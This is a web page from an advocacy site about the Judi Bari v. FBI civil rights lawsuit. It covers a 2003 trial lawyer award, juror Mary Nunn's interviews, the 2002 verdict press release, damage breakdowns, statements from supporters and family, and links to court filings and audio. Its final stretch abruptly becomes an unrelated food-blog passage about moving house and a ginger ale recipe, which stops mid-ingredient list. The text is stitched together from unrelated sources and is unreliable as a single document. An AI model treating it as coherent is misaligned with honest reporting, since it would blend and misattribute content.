Our excellent legal team has just won the prestigious Trial Lawyer of the Year award for 2003 for its work on the Bari vs. FBI case .
Our team shared the award with another legal team who won a large settlement reforming working and living conditions for sweatshop workers overseas .
Quoting the official announcement : Solo practitioners Dennis Cunningham , J. Tony Serra , Robert Bloom and Ben Rosenfeld of San Francisco , and William A. Simpich of Oakland , California , along with William H. Goodman of Moore & Goodman in New York and Michael E. Deutsch of The People 's Law Office in Chicago received the nationally prestigious award from The Trial Lawyers for Public Justice ( TLPJ ) Foundation at its 21st Anniversary Gala on July 22 , 2003 , for winning a rare $ 4.4 million jury verdict in Estate of Judi Bari v. Doyle against the Federal Bureau of Investigation ( FBI ) and the City of Oakland for violating the civil rights of two environmental activists during a 1990 bomb investigation .
This award is bestowed annually upon the trial lawyer or lawyers who have made the greatest contribution to the public interest by trying or settling a precedent - setting case .
It is the nation 's single most prestigious award for trial lawyers .
" These exceptional attorneys offer powerful examples of how trial lawyers play a crucial role in exposing and redressing government intrusion and corporate misconduct , " said outgoing Foundation President Paul Stritmatter of Stritmatter Kessler Whelan Withey Coluccio in Hoquiam , Washington .
" We are proud to honor them for their exemplary work defending the Constitution and protecting workers ' rights . "
In Estate of Judi Bari v. Doyle the jury found that both the FBI and the City had violated the First and Fourth Amendment rights of Earth First !
activists Judi Bari and Darryl Cherney , under the false cover of a " terrorist " investigation .
The verdict in this case sends a strong , cautionary message about the value of our constitutional rights and the abuse of law enforcement power in the name of national security .
You can read the full July 28 , 2003 press release from TLPJ announcing the award winners and other nominees .
It 's all the more impressive that our team won when you see the kind and importance of cases won by the other nominees .
Go team !
Congratulations !
Viva Judi Bari !!!
Judi Bari vs. the FBI : Snatching Victory from the Jaws of Deceit ( posted 4/13/03 )
Legal teamers Ben Rosenfeld and Dennis Cunningham wrote a new article about the case for the Fall 2002 issue of NLG Practitioner , the legal journal of the National Lawyers Guild .
It begins with a brief case overview , then , in the authors ' words : " use (s ) the case as a lens to explore a number of key challenges in civil rights litigation which we wrestled with , in order to aid fellow activists and attorneys in winning more ' people ’s victories . '
While we offer it as a law review article , we have not cluttered it with legal citations , in hopes that it will be accessible to attorneys and non-attorneys alike . "
Click here to read the article .
Juror Mary Nunn speaks out about the Bari vs. FBI trial on KMUD radio ( posted 8/20/02 , revised 8/29/02 )
Juror Mary Nunn was a guest on KMUD public radio's Women on Wednesday program on July 31 , 2001 .
She was also interviewed that day by KMUD news director Estelle Fennell .
Mrs. Nunn had a lot to say about the wrongdoing of the FBI and Oakland Police in the Bari - Cherney bombing case .
KMUD , with studios in Redway , California , is the community public radio station for the southern Humboldt County area where Darryl Cherney lives .
( www.kmud.org)
The Women on Wednesday talk show included an approximately 1 hr. segment with Mary Nunn .
We have split it into two MP3 files .
The KMUD News interview with Mary runs about 11.5 min. , and is a separate MP3 file .
Click here to stream the KMUD News segment ( M3U playlist )
Click here to stream the two Women on Wednesday files ( M3U playlist ) ( broken links fixed 8/24/02 ) Download KMUD News segment ( 1.6 MB ) - www.judibari.org/audio/nunnkmudnews.mp3
Download Women on Wednesday Part 1 ( 4.7 MB ) - www.judibari.org/audio/nunnkmudwow1.mp3
Download Women on Wednesday Part 2 ( 4.1 MB ) - www.judibari.org/audio/nunnkmudwow2.mp3
For more information on how to listen to these files please see our Audio index page .
Juror Mary Nunn interview published online ( 7/28/02 )
An in - depth interview with Bari vs. FBI trial juror Mary Nunn has just been published online by the Albion Monitor .
Following are a few excerpts .
Monitor :
You are the only juror who is willing to talk about your experience .
Mary Nunn : I really want to tell my story because I felt really passionate about it .
And for so long you could n't talk about it .
I think if you do n't speak out about it and tell the truth about what happened , and how it was manipulated , then people wo n't know .
And then every time they read something about the FBI they 'll be taken in .
...
When I started that trial I did n't know anything about environmentalists or that movement .
I did n't know anything about this group .
And I was kind of like , well , maybe they acted up a bit ; maybe the police were worthy .
I went in there with that attitude .
But when I sat and listened to the evidence , and I saw all that had happened , I did a 180 - degree turn in that courtroom .
And then my heart just poured out to them .
I could n't believe what they had been through .
...
Monitor : Did you think the police and FBI witnesses were lying in court ?
Nunn :
They absolutely were lying .
I did n't just think that they were lying .
The search warrant showed that they were lying .
Their inconsistency showed that they were lying .
Their stories did n't jibe , not one together .
Each one was evading the question or saying they did n't remember .
These people are notorious for note keeping .
They 're notorious for their files .
So all of a sudden they do n't recall anything ?
Well you had twelve years to catch up .
Why did n't you prepare yourself ?
Why did n't you go at least to acting classes and get lessons in how to present yourself in a desirable fashion on the stand ?
... Monitor : Eighty percent of the total damage award was for First Amendment violations .
How did the defendants violate the First Amendment rights ?
What acts did they do ?
Nunn :
One that really touched me was the nightly TV news spots that ( OPD Lt. Michael )
Sims delivered , smearing their name .
It was just character assassination .
It was just horrible .
Sending that all over the Bay Area and who knows where else .
" These are bombers .
There are no other suspects .
Our primary focus is on these two . "
It was horrifying .
How do you rebound from that ?
They lost their ballot Proposition 130 that year , not to mention the trees .
They lost their face in society .
Judi's kids were teased and taunted at school .
They had to walk around in fear , never knowing where this crazy bomber is at .
Monitor : Did you feel the defendants deliberately framed Judi and Darryl ?
Nunn : I think from the moment that ( Special Agent Frank )
Doyle came on that scene he went right to work , and they followed him .
I think they were heavily influenced by him .
But at a point in time , as they took the FBI helicopter out in the night , and they searched , and did other searches prior to that , and all those interviews , I think they finally came to a determination that , " you know what , we do n't have anything here . "
By that morning when they got back from the all - night search they could have let them go .
At any time they could start doing right , but they would n't .
They kept up with it .
So , yeah , it was deliberate , absolutely .
There was a point when they could have tried to clean it up .
... Read the full Mary Nunn interview in the Albion Monitor at : http://www.albionmonitor.com/0207a/judibaritrial13.html
( broken link repaired 8/21/02 )
Cops , FBI lied about probe , juror says
July 3 , 2002 --
Three weeks after they ordered Oakland police and the FBI to pay Earth First organizers $ 4.4 million , jurors were allowed to speak for the first time Tuesday , and one of them said " investigators were lying so much it was insulting . "
" The FBI and Oakland ( police ) sat up there and lied about their investigation , " said juror Mary Nunn of Oakley .
" They messed up their investigation , and they had to lie again and again to try to cover up .
I 'm surprised that they seriously expected anyone would believe them . "
Please click here to continue reading three press articles reporting juror comments .
Verdict Press Release from the Bari vs. FBI Media Office
OAKLAND , CA , Tuesday , June 11 , 2002 —
The jury in the Judi Bari and Darryl Cherney federal civil rights lawsuit against four FBI agents and three Oakland Police officers awarded plaintiffs $ 4.4 million for violation of the activists ’ constitutional rights and returned a verdict largely in favor of Earth First !
activists Cherney and the late Judi Bari .
In a legal victory of historic proportions against the FBI , the jury found that six of the seven defendants violated the First and Fourth Amendments of the Constitution by arresting the activists , conducting searches of their homes , and carrying out a smear campaign in the press , calling Earth First !
a terrorist organization and calling the activists bombers , in the aftermath of the explosion of a bomb that was planted in Judi Bari ’s car in 1990 .
This verdict finds unlawful the actions of those in charge of the bombing investigation , and vindicates Bari and Cherney .
FBI agents Frank Doyle , John Reikes , Philip Sena and OPD officer Mike Sims were found to have violated Bari and Cherney ’s First Amendment rights .
In addition , OPD officer Sitterud was found to have violated Cherney ’s First Amendment rights .
Doyle and Chenault were found to have violated Bari ’s Fourth Amendment rights related to the search of her home , and Doyle and OPD officer Chenault were found to have violated Cherney ’s Fourth Amendment rights .
FBI agent Doyle and OPD officer Sims were found to have violated Bari ’s Fourth Amendment rights in relation to her arrest .
The jury returned an " undecided " verdict with respect to violations of Cherney ’s Fourth Amendment rights for his arrest .
Frank Doyle was the agent in charge of the 1990 bomb scene , and taught an FBI bomb school at a Louisiana Pacific clearcut a month prior to the bombing .
Doyle was also the Squad 13 relief supervisor .
Squad 13 was the joint terrorism squad made up of FBI and Oakland officers and collected extensive files on political groups in the Bay Area .
Reikes was the head of the FBI ’s terrorist squad who came to OPD headquarters the day of the bombing to give the inflammatory briefing on Earth First !
Sena was already engaged in a secret investigation of Earth First ! and concocted a fake informant tip .
Sims was an OPD homicide lieutenant in charge of other officers investigating the bombing and the decision - maker for the unjust arrests of the activists .
Sitterud ignored evidence at the scene and concocted information that would implicate the activists .
Chenault wrote the first fraudulent search warrant affidavit .
This verdict is a referendum against the FBI ’s gross interference with people ’s right to dissent at a time when Attorney General Ashcroft , FBI Director Mueller and the Bush administration are arrogating huge power to themselves and the FBI to spy on legitimate groups and organizers and infringe the Constitutional rights of the public .
The filled - out 21 - page verdict form is available for viewing and printing at http://www.judibari.org/third_verdict_form_final.pdf
Click for site index
Darlene Comingore 's Letter to the Editor
Dear Editor : ( sent to several newspapers June 18 , 2002 )
Over the last twelve years , thousands of people in Northern California and through out the country have supported Judi Bari in her fight for justice with the FBI and Oakland Police Department .
That support has been in many forms .
Standing up for and with her when she was accused of being a terrorist .
Contributing money that allowed us to take this struggle to trial .
Supporting her right to have her day in court when that right was challenged from many sides .
Now after twelve years , a jury of working people found that the FBI and Oakland did a frame up job on Judi and that they did try to stop her work by knowingly and falsely accusing her of being a terrorist .
Although this victory comes after her death and goes no where near complete justice , what we have won is critical .
What we have won , besides clearing Judi ’s name , is a sign that people are unwilling to trade freedom for so - called security .
What we have won is a message to the FBI and police forces everywhere that if you violate the constitution you will be made to pay .
What we have won is a basis with which to challenge the actions of the current administration ’s efforts to rewrite the constitution , which would eliminate the requirement for evidence and proof before depriving someone of their freedom .
As Judi ’s close friend , political comrade , and the executor of her estate , I want to take this time to thank all of the people who have stood with us over these last twelve years .
Your support was the reason we were able to force the FBI and Oakland to be accountable for their actions .
Your support and action will help ensure that the constitution will be applied to all people in our country .
Darlene Comingore
Davis , California
Martha Bari's statement for the Bari family ( read by Martha Bari on Pacifica 's Democracy Now ! on June 12 , 2002 ; posted here 6/13/02 )
My family is grateful to the jury and wants to thank them for their courageous decision .
They have affirmed our faith in the justice system .
We 're only sorry that my sister Judi is no longer alive and able to share this sweet moment .
Before and after my sister 's bombing in 1990 , law enforcement that we normally turn to for protection was not there for her .
When the call went out over a Fort Bragg radio station to kill Judi Bari , no one stepped in to diffuse the situation .
When she received even more death threats , the local police cold - heartedly dismissed her pleas for help .
And after she was viciously bombed , the system failed her again .
When her family and friends came to her side at the Oakland hospital , they found her critically hurt and in horrific , obscene pain .
Yet Judi was also in a state of panic .
Not only could she receive no police protection from the anonymous bomber who was still at - large , but the Oakland Police wanted to pull her from her room and place her in handcuffs in the hospital 's prison ward for supposedly bombing herself .
She suffered further indignities when she heard herself characterized as an eco-terrorist bomber by the news media , and when her house was publicly searched by the FBI as she lay helplessly in her hospital bed .
Thereafter , she lived in constant pain and anxiety , and spent the rest of her life trying to clear her name .
The ripple effect of a violent crime is enormous .
When the authorities are against you rather than on your side , all the problems are magnified .
Judi suffered , her two young children suffered , her family suffered , and her wider community of friends and supporters suffered .
Now that the Oakland Police and the FBI have been brought to justice , they owe it to my family to explain what cause they had to hold my sister 's civil rights in such contempt .
Judi's political message was adamantly nonviolent .
Yet , for 12 long years she has been wrongly connected with terrorism .
After Sept. 11th and the threatening of many of our rights in the name of homeland security , I 'm afraid that this scenario will occur more often .
My family has seen up close how much harm can result when rights are ignored .
In Judi's case , the authorities stepped outside the law , and yesterday they were found guilty of false arrest , defamation of character , and illegal search and seizure .
The verdict reminds us that protection against terrorism should never outweigh the protection of our own civil rights .
Otherwise , like my sister Judi Bari , we will be made to suffer the consequences .
Listen online to Democracy Now 's radio coverage of the verdict featuring Martha Bari , Darryl Cherney and Bob Bloom ( June 12 , 2002 )
Darryl Cherney Interviewed in Earth First !
Journal
Here 's a snippet from the interview in August - September , 2002 issue EF !J : With striking implications for the Earth First !
and global justice movements , can you share your thoughts on what the verdict means to the movement ’s future ?
DC : First of all , it means that the movement can fight back .
We do n’t have to take this crap from the FBI .
I can tell you that the FBI probably finds nothing in the world more distasteful than to pay any activists in the Earth First !
movement four - and - a - half million dollars .
That , in and of itself , is very sweet .
Now we have n’t exactly gotten that money yet , and it might be years before we see a penny , nevertheless the concept is probably driving the FBI up the wall .
Secondly , it shows that Earth First ! was targeted by the FBI , and that we are victims of FBI terrorism , as opposed to being terrorists ourselves .
That the real terrorists are in government .
This news is certified in the record , and the FBI is going to have to live with that no matter what .
It also shows that 10 members of the American public can look at Earth First ! and look at the FBI and OPD and make a decision that the Earth First !
activists were trustworthy and that the police officers were not .
Click here to read more of " FBI on the Run - Darryl Cherney celebrates a stunning victory in the EF ! vs. FBI lawsuit " by Turtle ( opens a new window to EF !
Journal site ; close that window to return here )
Click for site index
Verdict Details ( posted 6/19/02 )
4TH AMENDMENT CLAIMS
Found to have violated Judi Bari 's rights in connection with her arrest
Frank Doyle ( FBI ) , John Reikes ( FBI ) , and Clyde M. Sims ( OPD )
Could a reasonable officer have believed that his conduct was lawful ?
Doyle No ; Reikes Yes ; Sims NO
( If yes they are immune from suit )
What amount do you award Bari to compensate for injury , loss or harm $ 235,000
Percentage of above damages
Doyle 10 % Sims 90 % Found to have violated Judi Bari 's rights in connection with May 25 , 1990 search
Doyle , Reikes , Sims , Robert Chenault ( OPD ) , Michael Sitterud ( OPD )
Could a reasonable officer have believed that his conduct was lawful ?
Doyle No ; Reikes Yes ; Sims Yes ; Chenault No ; Sitterud Yes
Damages $ 190,000
Percentages Doyle 70 % Chenault 30 % Found to have violated Darryl Cherney 's rights in connection with his arrest
All Undecided
Could a reasonable officer have believed that his conduct was lawful ?
Chenault Yes ;
All others Undecided Found to have violated Darryl Cherney 's rights in connection with May 25 , 1990 search
Doyle , Reikes , Sims , Chenault
Could a reasonable officer have believed that his conduct was lawful ?
Doyle No ; Reikes Yes ; Sims Yes ; Chenault No
Damages $ 50,000
Percentage
Doyle 70 % ; Chenault 30 % FIRST AMENDMENT CLAIMS
Found to have violated Judi Bari 's first amendment rights
Doyle , Reikes , Philip Sena ( FBI ) , Sims
Damages $ 1,175,000
Percentages Doyle 22.5 % ; Reikes 22.5 % ; Sena 5 % ; Sims 50 % Found to have violated Darryl Cherney 's first amendment rights
Doyle , Reikes , Sena , Sims , Sitterud
Damages $ 800,000
Percentages Doyle 17.5 % ; Reikes 17.5 % ; Sena 5 % ; Sims 50 % ; Sitterud 10 % CONSPIRACY CLAIMS
For conspiracy to violate Judi Bari and Darryl Cherney 's First Amendment rights
All not liable PUNITIVE DAMAGES Fourth Amendment Claims ( Judi Bari )
Doyle ( FBI ) $ 300,000 Fourth Amendment Claims ( Darryl Cherney )
Doyle ( FBI ) $ 100,000 First Amendment Claims ( Judi Bari ) $ 1,000,000
Reikes ( FBI ) $ 600,000 ; Sims ( OPD ) $ 400,000 First Amendment Claims ( Darryl Cherney ) $ 550,000
Reikes ( FBI ) $ 300,000 ; Sims ( OPD ) $ 250,000
Summary of Damage Awards ( Posted in response to media inquiries , revised 6/19/02 )
Total damages $ 4,400,000 1st Amendment $ 3,525,000 ( 80.1 % ) , 4th Amendment $ 875,000 ( 19.9 % ) FBI defendants $ 2,399,000 ( 54.5 % ) , OPD defendants $ 2,001,000 ( 45.5 % ) Compensatory $ 2,450,000 ( 55.7 % ) , Punitive $ 1,950,000 ( 44.3 % ) Judi Bari $ 2,900,000 ( 65.9 % ) , Darryl Cherney $ 1,500,000 ( 34.1 % )
Punitive damages $ 1,950,000 FBI defendants $ 1,300,000 ( 66.7 % ) , Oakland defendants $ 650,000 ( 33.3 % )
Click here for a spreadsheet table of the damages giving more detail and summing up damages by plaintiff , defendant , violation , agency , and punitive vs. compensatory
Click for site index
More News , Updates and Hot Items
BariNews email list
Our main email channel for press releases , bulletins , announcements and news clippings from the Bari vs. FBI law office and media center in Oakland .
Subscribe to the list by sending a blank email from the address where you want to receive messages to BariNews-subscribe@yahoogroups.com
An archive of BariNews bulletins sent to date can be found at the BariNews home page at Yahoo Groups .
Bari v. FBI trial coverage in Albion Monitor
The Albion Monitor is an independent progressive Internet newspaper which has reported extensively about Judi Bari and the bombing case and trial .
The link above opens the Monitor 's Judi Bari Resources Index page in a new window .
Once you 're there , be sure to also visit the Monitor 's front page by clicking on the Monitor logo at the top of the page .
Hundreds attend May 24 , 2002 Judi Bari Day rally ( posted 5/24/02 )
Several hundred people gathered for the annual noon rally in the courtyard of the Oakland Federal Building May 24 , 2002 , to mark the 12th anniversary of the car - bombing of Judi Bari and Darryl Cherney .
The rally also celebrated the first annual Judi Bari Day , honoring the late environmental , labor and social justice organizer .
The rally also celebrated the end of seven weeks of trial in Judi Bari and Darryl Cherney 's historic federal civil rights suit against the FBI and Oakland police .
Members of our legal team spoke , including Dennis Cunningham , Tony Serra , Bob Bloom , Bill Simpich , Ben Rosenfeld and Alicia Littletree .
Folksinger Utah Phillips and fiddler Morgan Fichter hosted the rally , whose theme was " Fiddle Down the FBI , " referring to the FBI seizing Judi 's childhood fiddle as evidence and never giving it back .
Musicians included Utah Phillips , Laurie Lewis , Darryl Cherney , Alicia Littletree and many more .
For a nice essay on the rally by Dan Brook on the ZNet website click here ( Opens in a new window .
Close it to return here . )
Click for site index
Judi Bari deposition audio -- MP3 files taken from the audio track of her deposition videotape as shown in court at the end of trial in Bari vs. FBI , May 2002 .
Judi's sworn deposition was taken just a month before her death in order to preserve her testimony in a form admissible at trial .
This is the depo that the FBI did n't want to happen .
Their attorney Joe Sher threatened to delay it .
When Judi's impending death from cancer was mentioned , Sher accused her of faking cancer .
He used his threat of delay to coerce an agreement that the deposition could not be made public except whatever portions became part of the court record .
He then objected to virtually every question asked of Judi by Dennis Cunningham , then objected to Judi 's answers , interfering with their train of thought and the flow of the story .
Judi was very ill and was lying on a couch propped up with pillows but she told her truth and got it on record .
The two days of deposition were reduced to just 90 minutes of edited video shown to the jury , with all of Sher 's objections edited out along with much of Judi 's testimony .
See below for the transcript of Judi 's deposition .
There are three MP3 files of approximately 30 min. each .
which you can stream or download .
Click here to go to the Audio Files page to access the files .
( Updated 6/14/02 )
Names and brief information about the plaintiffs , defendants , legal teams , witnesses and other names involved in the trial of Judi Bari and Darryl Cherney 's civil rights suit against certain FBI agents and Oakland Police officers .
It also lists the order in which witnesses have been called .
Click for site index
Full text of Order for Entry of Partial Verdict in Acrobat PDF format ( posted 8/27/02 )
Judi Bari deposition transcript in Acrobat PDF format ( posted 5/31/02 )
This is the redacted ( censored ) version authorized by the court as a guide for editing the videotaped deposition shown to the jury at trial .
This version maintains the official page and line numbering , but has been compressed from double spacing to single , and multiple pages per sheet .
By a combination of the redaction and the layout compression , 281original pages have been reduced to a 53 page Adobe Acrobat file .
Note that MP3 audio files of the deposition are also available on this website .
Jury Instructions and Final Verdict Form ( details of 6/11/02 verdict )
The judge 's official legal instructions to the jury and the filled in jury verdict form returned by the jury to report their verdict are available in Acrobat PDF format .
Because these are graphic images of the pages rather than text , the files are fairly large , about 300 K each , but they have been optimized for rapid Web view , so if you have an up - to - date version of Acrobat Reader the first page will display very quickly , and you wo n't have to wait for the whole document to download before you can begin reading it .
Once the file is fully downloaded you can save it to disk for future reference .
Offer of Proof re FBI Misconduct , COINTELPRO ( filed 5/14/02 )
Plaintiffs proffer the testimony of two experts on the policy and practice of COINTELPRO – the purpose of which was to maintain the existing social and political order by the use of techniques carrying a serious risk of physical , emotional , and economic damage .
The techniques also include callous disregard of clearly established law , the prevention and disruption of the exercise of First Amendment rights by the use of propaganda , bogus mailings and pamphlets , the use of informants , fictitious organizations , the use of hostile third parties to raise controversial issues against targeted groups , and the dissemination of derogatory information and the interference with and abuse of the judicial process .
Plaintiffs ' proof also includes evidence of the FBI 's practice of using state authorities to conduct raids , make arrests , and prosecute cases based on spurious charges .
The use of all such FBI practices are present in the instant case .
The offer shows a 65 - year history of such policy and practices , continuing to the present day .
The brief includes statements about the Bari case by historian Prof. Howard Zinn and by Flint Taylor Esq. , an attorney with deep knowledge of the FBI 's methods for " neutralizing " political targets .
Judge Wilken ruled that this information was irrelevant to the case against the individual defendants and barred it from being mentioned during the trial .
This document was submitted to make an additional record for appeal .
Click here to read the full 45 page document in Adobe Acrobat PDF format .
( 307KB PDF file )
Plaintiffs ' Opening Statement
Dennis Cunningham 's opening argument to the jury sets out what the case is about , what the evidence will show and what plaintiffs would like the jury to do about it .
Court Reporter 's Transcript .
( posted 4/28/02 )
Trial Brief
Summarizes the false arrest and conspiracy case against the FBI and Oakland Police .
In Adobe Acrobat format , requires the free Acrobat Reader .
( posted 2/6/02 )
Statement by noted historian Prof. Howard Zinn
on the FBI 's long history of political repression ( posted 7/19/01 )
Statement by former FBI Special Agent John C. Ryan
on routine fraud by FBI agents in handling supposed informant information .
( posted 7/19/01 ) More Legal Documents online
Click for site index
Featured Items
Judi Bari shows police photo of her bombed car .
Photo by Evan Johnson © 1993
Our Judi Bari web photo gallery is now online for your enjoyment and information .
DNA evidence withheld for years by the FBI which provides valuable clues as to who bombed Earth First !
organizers Judi Bari and Darryl Cherney in 1990 was released at a Sept. 18 press conference following the testing for genetic material found on envelopes of three key documents .
The Mendocino County Sheriff 's Office has opened a new investigation into this evidence .
( posted 9/18/01 )
Bomb School , and Other Atrocities , Judi's brilliant October 1994 article about the FBI Bomb School and evidence that the FBI deliberately put out false information to smear her as a terrorist rather than being the victim of an assassination attempt .
Illustrated with photos of the bombed car .
( posted 3/1/01 )
Click for site index
MP3 Audio Files are available on this site
Revolutionary Ecology - The Legacy of Judi Bari -- 58 min. radio documentary narrated by Ruby Dee and produced by Noelle Hanrahan .
This excellent program aired on the Alternative Radio series in December , 2000 .
In Judi's own words and the comments of Carl Anthony , Karen Picket , Michael Parenti , Ed Herman , Jose Lopez , Geronimo ji jaga and Ramona Africa , this radio documentary tells her story .
You can listen to this program via MP3 streaming audio or download it to your computer 's hard drive from our Audio Files page .
( added 1/29/01 )
Read the Transcript of the program .
( added 1/30/01 ) Judi's 1996 Berkeley presentation of her case against the FBI .
Hear Judi at her awesome peak , revealing her impish sense of humor , her intellect , and her amazing grasp of the case .
Laugh while you learn the shocking facts in a way you 'll remember .
Alicia Littletree broadcast this program May 12 , 2000 on KZYX / KZYZ Mendocino County Community Radio .
Thanks , Alicia .
Music files available for download in high quality MP3 format The FBI Stole My Fiddle
Who Bombed Judi Bari ?
Click here to go to the Audio Files Page Hear Judi Bari tell of being bombed on May 24 , 1990 Listen to a 4 min. audio clip from the CD " Who Bombed Judi Bari "
Click here to stream an MP3 file to Winamp or other players that use M3U playlists
or Click here to stream an MP3 file to Windows Media Player
For more sound files , visit our Audio index page
The REAL Eco-Terrorism — COINTELPRO Tactics Target Environmentalists
RSJP 's four - page illustrated brochure included with the August 1999 mailing covers recent incidents of harassment of activists such as the firebombing of an Earth First !
activist 's van in Ohio , the pipe bombing of the Forest Guardians in New Mexico , new FBI investigation of EF !
activist Darryl Cherney , harassment and investigation of activists at Headwaters Forest , Vail Colorado , and Minnehaha Minnesota , a disinformation campaign aimed at discrediting Judi Bari 's case against the FBI , and more .
Click here for the complete brochure as an Adobe Acrobat PDF file , complete with four photos , graphics and nice layout exactly as printed for the mailing .
( Note : 260 K download takes time but it's worth the wait .
( Note : you need the Adobe Acrobat Reader installed on your computer to read this file .
If you do n't have it , please go to http://www.adobe.com/prodindex/acrobat/readstep.html for a free download of the latest version . ) .
Report by Noelle Hanrahan in association with RSJP and included with the April 1998 update mailing .
On April 22 , 1970 , as 22 million Americans rallied across the country on the first Earth Day celebration , FBI agents in over 40 cities were ordered to spy on and infiltrate these events .
Senator Edwin Muskie , himself a victim , remarked from the floor of Congress that this surveillance was " a dangerous threat to fundamental constitutional rights . "
The power of the environmental movement and the challenge it posed to business - as - usual made it an instant target for FBI suppression .
( posted 4/13/98 )
The Judi Bari Bombing Revisited -- Big Timber , Public Relations and the FBI -- analysis and commentary by Nicholas Wilson
( Note : This article should open in a new browser window . )
This article reviews the evidence and presents a theory that Judi was bombed and then framed for it as part of a timber industry public relations campaign to defeat the Forests Forever initiative , Prop. 130 on the November 1990 ballot .
The corporations paid giant PR firm Hill & Knowlton millions to smear ( with the collaboration of the FBI ) Judi and Earth First ! as violent extremists , and then to falsely link Prop. 130 to EF ! in the voters ' minds .
The industry would have lost billions of dollars if the initiative had passed , and the corporations spent some $ 20 million to defeat it .
The article also reviews the FBI 's history of repression of activists for social and political change and discusses the Bari bombing in light of Operation THERMCON , the FBI 's plan to neutralize EF !
by trying to connect its best known leaders with explosives .
Published in the Albion Monitor May 28 , 1999 ( posted 6/17/99 )
For more information please read :
Click for site index
Secret FBI Political Disruption Helped Elect Reagan ( 6/9/02 )
The June 9 , 2002 Sunday San Francisco Chronicle contains a blockbuster special report titled The Campus Files - Reagan , Hoover and the UC Red Scare .
The report fills an entire section of the newspaper , where the blurb says : " Secret FBI files show how the bureau 's covert campaign to disrupt the Free Speech Movement and topple UC president Clark Kerr helped launch the political career of an actor named Ronald Reagan . "
Judge Claudia Wilken -- then a federal magistrate but later presiding over the Bari vs. FBI trial -- played a key role in the story when she ruled against the FBI and made them un-redact hundreds of pages of FBI files that had been provided to Chronicle writer Seth Rosenfeld , who fought a 17 - year legal battle under FOIA to force the FBI to turn over more than 200,000 pages of files .
The whole Chronicle special report is available on the web at http://www.sfgate.com/news/special/pages/2002/campusfiles/
Highly recommended !
But do n't go away yet ; there 's lots of good stuff to read here too .
Democracy Now !
features COINTELPRO documentary
The June 5 , 2002 program focuses on the history of the FBI and COINTELPRO .
You can listen to the entire 1 - hr. program via Real Audio .
Includes part of the 1976 Pacifica radio documentary " Me and My Shadow , " with interviews of former FBI informers and agent provocateurs .
David Sannes was an FBI informer / provocateur in Seattle who quit when he learned the FBI planned to have an activist die in a booby trap bomb explosion and then blame him for the bomb .
( posted 6/5/02 )
http://www.webactive.com/pacifica/demnow/dn20020605.html
The June 6 , 2002 program includes more of the " Me and My Shadow " documentary about COINTELPRO ( posted 6/6/02 )
http://www.webactive.com/pacifica/demnow/dn20020606.html
Photo © 1991 Evan Johnson
Featured Quotes
I was attracted to Earth First !
because they were the only ones willing to put their bodies in front of the bulldozers and the chainsaws to save the trees .
They were also funny , irreverent , and they played music .
But it was the philosophy of Earth First !
that ultimately won me over .
This philosophy , known as biocentrism or deep ecology , states that the Earth is not just here for human consumption .
All species have a right to exist for their own sake , and humans must learn to live in balance with the needs of nature , instead of trying to mold nature to fit the wants of humans .
Judi Bari , Ms. Magazine 1992 Letter to Editor - S. F. Chronicle - March 11 , 1997 Judi Bari 's life has ended much too soon .
Seeing her work evolve over the years brought me continued hope and inspiration .
Margaret Mead once wrote : “ Never doubt that a small group of thoughtful , committed citizens can change the world , it 's the only thing that ever does . ”
Judi's small stature belied her powers of influence , a bear in the forest confident and strong .
Consistently an ardent defender of all remaining old - growth redwoods , Judi ’s mantra remains the heart of the current Headwaters debate .
Headwaters is a battle we can not afford to lose , if we let those who are intent upon felling the remaining unprotected redwood groves , the movement will have lost a historic opportunity to disable the forces threatening our natural heritage .
The wilderness advocates , local community activists and labor forces who embraced Judi 's call to action were moved by her disdain for senseless destruction .
These sometime disparate constituencies have greatly aided our efforts , without compromising our goals .
We must continue to strengthen those alliances and demand an unconditional sanctuary for all the remaining old - growth redwood forest ecosystems .
Life on Earth is a precious and tenuous experience and times like these remind us of the importance to remain committed to that which is most meaningful in our lives .
Judi always projected an unwavering commitment to her values , and her continued urgings to affect apathy into action .
We will miss her commitment and compassion , her strength , courage and conviction .
We can honor hers by sharing it .
David R. Brower ( David Brower died Nov. 5 , 2000 , after a long and distinguished life as one of America 's foremost environmental leaders . )
Over the years we have been warned about the danger of subversive organizations that would threaten our liberties , subvert our system , would encourage its members to take further illegal action to advance their views , organizations that would incite and promote violence , pitting one American group against another ...
There is an organization that does fit those descriptions , and it is the organization , the leadership of which has been most constant in its warning to us to be on guard against such harm .
The [ FBI ] did all of those things .
[ emphasis added ] Senator Philip A. Hart
Senate Select Committee on Intelligence Activities and the Rights of Americans , 1975
About Redwood Justice Fund and Redwood Summer Justice Project
Judi Bari founded the nonprofit Redwood Justice Fund and its Redwood Summer Justice Project in 1991 to organize political and financial support for her lawsuit against the FBI and Oakland Police , which was finally won in 2002 and ultimately resolved in 2004 .
RSJP maintains this website as a resource for information about Judi Bari and an archive of her writings and speeches .
For more information click here .
Please consider a donation to support the development and maintenance of this website and the archiving of materials about or by Judi Bari .
We accept secure online donations through Paypal .
Just click on the PayPal logo below .
Finally !
We moved , but it ’s not all smooth sailing yet .
We ’re living out of boxes and we do n’t have a kitchen yet .
While our perfect kitchen is being built ( which we will be talking about soon ) , I ’m going to have to get crafty .
I do have many plug - in appliances ( rice cooker , toaster oven , panini press , waffle maker , microwave , etc. ) so we ’re still going to have a ball here .
I think we ’re going to be pleasantly surprised with how much I ( or you ) can do without a kitchen .
( Gulp ) Determined to eat well every single day without exceptions , here goes …
Whenever I got sick as a kid , I got handed Ginger Ale and Saltines .
By force of habit , that ’s still what I crave when I ’m sick .
But , many commercial ginger ales do n’t even have real ginger in them any more .
Even the ones that do , or claim to , do n’t really taste like ginger .
You have to drink it , hold some in your mouth , close your eyes , and think real hard .
Oh , there ’s the ginger ….
I think .
That kind of defeats the purpose .
Ginger is good for you , and helps with nausea and upset stomachs , plus a handful or other health benefits .
Last time Lon got sick , I went searching for some real ginger , ginger ales .
I found a few good ones at Whole Foods ( sorry forgot which brands ) and I ’ve tried a few good ginger beers as well .
They have that real ginger spice but most end up being too sweet for me , and rather expensive .
This time , while I was sick , Lon tried making me some ginger ale .
After a few attempts , we came up with this Ginger Ale , which is made to my preference .
Lon would take it a little sweeter .
I find this one very refreshing , being lighter than the standard , and the lemon ginger combo really does help with the nausea .
Use it as a guideline to help make your own preferred ginger ale .
The reason I give this as a one serving recipe is because if you make a lot and do n’t drink it immediately , it will go flat .
Plus , ultra fresh lemon and ginger has a zing that just ca n’t be beat .
But , if you are going to be drinking several cups in a span of one to two days , it would make sense to make a ginger mix ( which is also below ) .
Then , you can use that ginger mix to make ginger ale per cup as you want .
Homemade Ginger Ale
~for one
1 tablespoon grated ginger ( use a microplane )
1/2 teaspoon sugar
2 teaspoons freshly squeezed lemon juice
2 teaspoons light brown sugar
